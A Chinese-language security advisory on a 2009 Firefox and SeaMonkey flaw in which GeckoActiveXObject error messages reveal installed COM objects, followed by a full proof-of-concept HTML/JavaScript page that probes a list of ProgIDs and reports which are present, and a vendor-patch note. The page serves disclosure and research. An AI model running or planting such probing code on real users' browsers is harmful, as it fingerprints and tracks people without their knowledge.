影响版本:
Mozilla Firefox 3.5.x Mozilla Firefox 3.0.x Mozilla SeaMonkey 2.0
漏洞描述:
Firefox是一款流行的开源WEB浏览器。
Firefox是一款流行的开源WEB浏览器。
Mozilla的GeckoActiveXObject所生成的异常消息会根据系统注册表中是否存在所请求COM对象的ProgID而不同,恶意站点可以根据这个差异枚举出用户系统上所安装的COM对象列表,并创建配置文件跨浏览会话追踪用户。
<*参考
http://www.mozilla.org/security/announce/2009/mfsa2009-71.html
https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=503451
http://secunia.com/advisories/37699/
*>
测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
<?xml version="1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <!-- Copyright (c) 2009, Gregory Fleischer (gfleischer@gmail.com) License: Revised BSD --> <head> <title>COM Enumeration using GeckoActiveXObject</title> <script type="text/javascript">//<![CDATA[ var matches = []; var progIDs = [ "akadlkasdlfkj.akadlkasdlfkj", "MSXML2.DOMDocument","MSXML2.DOMDocument.2.0", "MSXML2.DOMDocument.3.0", "MSXML2.DOMDocument.4.0", "MSXML2.DOMDocument.5.0", "MSXML2.DOMDocument.6.0", "Word.Document.6", "Word.Document.8", "Word.Document.10", "Word.Document.12", "QuickTime.QuickTime", "QuickTime.QuickTime.9", "RealPlayer.HWEventHandler", "JavaPlugin", "JavaPlugin.FamilyVersionSupport", "JavaPlugin.160_12", "JavaPlugin.160_13", "JavaPlugin.160_14", "ShockwaveFlash.ShockwaveFlash", "ShockwaveFlash.ShockwaveFlash.11", "ShockwaveFlash.ShockwaveFlash.10", "ShockwaveFlash.ShockwaveFlash.9", "ShockwaveFlash.ShockwaveFlash.6", ]; function check_object(progID) { try { var obj = new GeckoActiveXObject(progID); } catch (e) { var err = e.toString(); if (err.match(/COM\s*Error\s*Result\s*=\s*80004005/i)) { matches.push(progID); } else if (!err.match(/COM\s*Error\s*Result\s*=\s*800401f3/i)) { alert("unexpected response: " + e); } } } function test(){ matches = []; if ("undefined" == typeof(window.GeckoActiveXObject)) { alert("GeckoActiveXObject only supported on Windows"); } else { for (var i = 0; i < progIDs.length; ++i) { check_object(progIDs[i]); } } if (matches.length > 0) { if (matches.length == progIDs.length) { alert("matched everything? that's unlikely"); } else { alert("matched: " + matches.join(", ")); } } else { alert("no matches detected"); } } function init() { } //]]> </script> </head> <body onload="init();"> GeckoActiveXObject exceptions: <ul> <li>COM object not installed: COM Error Result = 800401f3</li> <li>COM object installed: COM Error Result = 80004005</li> </ul> <input type="button" name="run test" value="run test" onclick="test()"/> </body> </html> <!-- Keep this comment at the end of the file Local variables: mode:xml-html sgml-declaration:"~/lib/DTD/xhtml1/xhtml1.dcl" sgml-default-dtd-file:"~/lib/DTD/xhtml1/xhtml1-transitional.ced" End: -->
安全建议:
厂商补丁: Mozilla ------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: http://www.mozilla.org/
0 条评论。